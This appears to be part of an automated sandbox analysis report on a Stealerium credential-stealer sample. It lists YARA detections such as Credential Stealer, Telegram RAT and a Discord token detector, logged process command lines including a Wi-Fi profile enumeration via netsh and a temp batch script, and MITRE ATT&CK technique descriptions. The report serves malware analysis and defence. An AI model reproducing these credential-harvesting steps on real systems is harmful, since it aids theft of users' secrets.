Yara matches:	Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2615455822.0000024A458D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2615455822.0000024A45ABE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2615455822.0000024A45C6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2615455822.0000024A45A18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2615455822.0000024A45701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2615455822.0000024A458EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000002.2615455822.0000024A457DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2615455822.0000024A457DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2615455822.0000024A457DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2615455822.0000024A457DB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.2322470086.0000024A436A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.2322470086.0000024A436A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2322470086.0000024A436A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.2322470086.0000024A436A2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	06:18:41
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff64f010000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	06:18:42
Start date:	29/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6ec5c0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	14
Start time:	06:18:59
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4d347f08-badb-4aa2-85cc-e67036e9d72f.bat"
Imagebase:	0x7ff64f010000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	06:19:00
Start date:	29/11/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /T 2 /NOBREAK
Imagebase:	0x7ff6d2960000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre